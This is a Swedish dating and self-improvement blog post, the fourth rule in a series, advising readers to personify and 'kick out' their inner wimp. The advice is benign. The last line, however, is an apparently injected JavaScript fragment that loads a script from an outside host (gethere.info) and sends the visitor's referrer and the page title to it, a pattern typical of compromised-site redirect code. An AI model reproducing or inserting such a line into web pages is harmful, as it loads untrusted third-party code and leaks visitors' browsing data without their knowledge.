Tja! icon smile Regel 4: Sparka ut din inre mes.

Det här är fjärde delen i följetongen där vi går igenom ett antal viktiga regler för att utvecklas i allmänhet, men för att bli bra med tjejer i synnerhet. Bakgrunden till formatet kan du läsa om i min första post i serien, länkar till alla delar i serien hittar du i slutet av varje post…

Regel 4: Sparka ut din inre mes.

Den här regeln handlar helt enkelt om att sluta vara en mes och jag föreslår att du gör det väldigt grafiskt för dig själv.

Ge honom ett namn (ni som har läst bloggen länge vet att Kian kallar honom ”Fingus”), gör honom tydlig och lär känna honom. Lär dig hata honom, och slutligen: sparka ut honom. Ni som har sett vår DVD vet att jag pratar om honom även där, men då under epitetet ”din inre chode”.

Det här är bl.a. knutet till den andra regeln om att ta ansvar, det är nämligen din ”inre mes” som inte vill att du ska ta ansvar och som hellre skyller på andra. Det är han som står för självömkan, bitterhet och alla andra små känslor som vi känner. Han kan oftast kännas som en kär gammal vän eftersom han alltid står på din sida och säger att det inte är ditt fel, att det är alla andras fel och att livet är orättvist. Men det är inte sant. Han är inte bara din fiende, han är förmodligen din farligaste och mest lömska fiende, om man nu vill vara dramatisk. icon wink Regel 4: Sparka ut din inre mes.

Det ligger också i sakens natur att han gärna flyttar in igen när man minst anar det, även om man lyckats sparka ut hans arsle en gång. Det gäller att vara på sin vakt, vilket också är en bra anledning att lära sig känna igen honom, så man vet när det är dags igen.

Hela den här grejen kanske låter töntig och jag medger att jag skrivit det lite väl bildligt. Det handlar dock om att lära sig känna igen sina egna negativa och destruktiva mönster och ta avstånd från dem, och då är det ofta en bra idé att göra det bildligt för att göra situationen enkelt greppbar för sig själv.

Gör det här till en faktisk och väldigt tydlig process för dig själv. I vilka lägen mesar du ur? När agerar du på sätt som du vet inte tar dig dit du vill eller som får dig att känna dig som en dålig version av dig själv? När agerar du på ett sätt som får dig att skämmas inför dig själv efteråt? Identifiera de här sakerna och använd just de situationerna till att sparka ut honom. Börja göra en poäng av att agera helt motsatt det den här inre rösten som vill hålla dig tillbaka säger.

Han har helt enkelt ingenting i ditt liv att göra, och han kan bara vara kvar så länge du upplåter en plats åt honom att bo. icon smile Regel 4: Sparka ut din inre mes.

Get some. icon wink Regel 4: Sparka ut din inre mes.

Kram,
Victor

Länkar till övriga delar i serien:
Regel 1: Acceptera allting som det är.
Regel 2: Ta ansvar.
Regel 3: Jobba på dig själv, inte på tjejerna.

Regel 5: Bygg en stark och kapabel självbild som du älskar.
Regel 6: Förändra dig från att vara en person med en extern referensram till en person som har en intern referensram.
Regel 7: Bygg inte din identitet på externa händelser.
Regel 8: Lär av dina misstag.
Regel 9: Använd dig själv som benchmark för din utveckling.
Regel 10: Sträva alltid efter nästa nivå.
Regel 11: Betrakta dig själv som en person med hög social status.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;